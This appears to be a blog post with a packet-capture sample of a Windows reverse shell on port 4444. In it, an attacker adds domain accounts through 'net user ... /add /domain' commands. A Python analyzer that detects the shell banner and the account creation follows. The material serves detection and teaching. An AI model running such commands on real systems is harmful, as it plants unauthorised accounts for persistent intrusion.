Converted PCAP sample of a Microsoft Windows Reverse Shell

By | August 22, 2015

Converted PCAP sample of a Microsoft Windows reverse shell. The shell is spawned on port 4444: the hacked PC initiates the connection to 192.168.1.109, which has a Netcat listener waiting on port 4444 to spawn a command-line shell on connect. Once the shell is spawned you can see a user being created and added to the domain. This style of reverse shell is not seen as much as it once was; in the older days many individuals and companies ran Remote Desktop on port 3389 and left it open to the public, allowing hackers to create users and log in directly to the machine as if they were there. If you are going to run RDP, you need to make sure you ACL it to only your internal network or trusted users, and use encryption.


2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 1:37, ack 1, win 238, length 36
E..L…….
.#…sQ…….P…….Microsoft Windows [Version 6.0.6001]
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 1:37, ack 1, win 238, length 36
E..L……
.#…sQ…….P…….Microsoft Windows [Version 6.0.6001]
2015-01-19 12:37:15 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [.], ack 37, win 16551, length 0
.#.(7.@.x.. .
.<..s……Q…P……….
2015-01-19 12:37:15 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [.], ack 37, win 1651, length 0
.#.(.@.x.. .
.<..s……QP.@…..
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 37:117, ack 1, win 248, length 80
E..x..@…..
…sQ…….P…….
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows>
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 37:117, ack 1, win 252, length 66
E..x..@…..
.#…sQ…….P…….
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows>
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 1:49, ack 117, win 16531, length 48
.#.X7.@.x….
.<..s……Q..0P.@…..net user Chris.James Pwnz3d /add /domain
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 1:49, ack 117, win 16531, length 48
.#.X7.@.x….
.<..s……Q..0P.@…..net user Chris.James Pwnz3d /add /domain
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 49:51, ack 117, win 16534, length 2
.#.*7.@.x….
.<..s……Q..0P.@…..
….
2015-01-19 12:39:33 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 51:100, ack 180, win 16515, length 49
.#.Y7.@.x….
.<..s……Q..oP.@…..net user Josh.Brown Pwnz3d /add /domain
2015-01-19 12:39:33 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 51:100, ack 180, win 16515, length 49
.#.Y7.@.x….
.<..s……Q..oP.@…..net user Josh.Brown Pwnz3d /add /domain
2015-01-19 12:39:50 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 333:385, ack 152, win 258, length 52
E..\!.@….
.#…sQ…….P…….The command completed successfully.

C:\Windows>
2015-01-19 12:39:50 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 333:385, ack 152, win 258, length 52
E..\!.@….
.#…sQ…….P…….The command completed successfully.
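The capture above is plain tcpdump -A text, so the indicators it contains (the cmd.exe version banner and drive-letter prompt sent in cleartext, and net user ... /add /domain typed into the session) can be picked out with a few regular expressions. What follows is an added example, not code from the original post: a small Python analyzer that groups such lines into TCP flows, identifies which side emitted the shell banner, and lists the accounts the operator tried to add. The header regex, the scoring heuristics and SAMPLE_DUMP (constructed in the style of the capture above, with the non-printable header bytes replaced by dots) are assumptions of this example.

```python
"""Flag a cleartext Windows command shell and account creation in tcpdump -A text.

Added example; the header format and heuristics are assumptions, not the post's tooling.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

Endpoint = Tuple[str, int]

# Packet header as printed by "tcpdump -tttt -nn -A"; its payload lines follow it.
HEADER_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) IP "
    r"(?P<sip>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dip>\d+(?:\.\d+){3})\.(?P<dport>\d+): Flags \[[^\]]*\].*length \d+$"
)
BANNER_RE = re.compile(r"Microsoft Windows \[Version [^\]]+\]")  # cmd.exe greeting
PROMPT_RE = re.compile(r"[A-Za-z]:\\[^>\r\n]*>")                  # e.g. C:\Windows>
# "net user <name> <password> /add [/domain]" typed into the shell
NET_USER_ADD_RE = re.compile(
    r"net\s+user\s+(?P<user>\S+)\s+\S+\s+/add(?P<domain>\s+/domain)?", re.IGNORECASE)


@dataclass
class Packet:
    ts: str
    src: Endpoint
    dst: Endpoint
    payload: str


@dataclass
class FlowReport:
    endpoints: Tuple[Endpoint, Endpoint]
    first_seen: str
    packets: int = 0
    shell_host: Optional[Endpoint] = None  # side that emitted the cmd.exe banner/prompt
    operator: Optional[Endpoint] = None    # side that typed the commands
    accounts_added: List[Tuple[str, bool]] = field(default_factory=list)  # (user, /domain?)

    @property
    def severity(self) -> str:
        if self.shell_host and self.accounts_added:
            return "high"
        return "medium" if self.shell_host else "low"

    def summary(self) -> str:
        host = "%s:%d" % self.shell_host if self.shell_host else "unknown"
        users = ", ".join(u + (" (domain)" if d else "") for u, d in self.accounts_added)
        return f"[{self.severity}] {self.first_seen} cleartext cmd.exe on {host}; " \
               f"accounts added: {users or 'none'}"


def parse_tcpdump(text: str) -> List[Packet]:
    """Split tcpdump -A text into packets; every non-header line belongs to the last header."""
    packets: List[Packet] = []
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HEADER_RE.match(line)
        if m:
            packets.append(Packet(m["ts"], (m["sip"], int(m["sport"])),
                                  (m["dip"], int(m["dport"])), ""))
        elif packets:
            packets[-1].payload += line + "\n"
    return packets


def analyze(text: str) -> List[FlowReport]:
    """Group packets into TCP flows and flag shell banners and account creation per flow."""
    reports: Dict[Tuple[Endpoint, Endpoint], FlowReport] = {}
    for pkt in parse_tcpdump(text):
        key = tuple(sorted([pkt.src, pkt.dst]))
        rep = reports.setdefault(key, FlowReport(endpoints=key, first_seen=pkt.ts))
        rep.packets += 1
        if BANNER_RE.search(pkt.payload) or PROMPT_RE.search(pkt.payload):
            rep.shell_host, rep.operator = pkt.src, pkt.dst
        for m in NET_USER_ADD_RE.finditer(pkt.payload):
            entry = (m["user"], m["domain"] is not None)
            if entry not in rep.accounts_added:  # the capture repeats packets; count each user once
                rep.accounts_added.append(entry)
    return list(reports.values())


# Constructed sample in the style of the capture above (non-printable header bytes shown as dots).
SAMPLE_DUMP = """\
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 1:37, ack 1, win 238, length 36
E..L.......sQ.......P.......Microsoft Windows [Version 6.0.6001]
2015-01-19 12:37:15 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [.], ack 37, win 16551, length 0
.<..s......Q...P..........
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 1:49, ack 117, win 16531, length 48
.<..s......Q..0P.@.....net user Chris.James Pwnz3d /add /domain
2015-01-19 12:39:33 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 51:100, ack 180, win 16515, length 49
.<..s......Q..oP.@.....net user Josh.Brown Pwnz3d /add /domain
2015-01-19 12:39:50 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 333:385, ack 152, win 258, length 52
.#...sQ.......P.......The command completed successfully.

C:\\Windows>
"""

if __name__ == "__main__":
    for report in analyze(SAMPLE_DUMP):
        print(report.summary())
```

Run directly it prints one summary line per flow; analyze() returns the reports so they can be unit-tested or forwarded to a SIEM. The side that sends the banner is treated as the compromised host regardless of which side opened the TCP connection, which is what a responder usually wants to know first.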
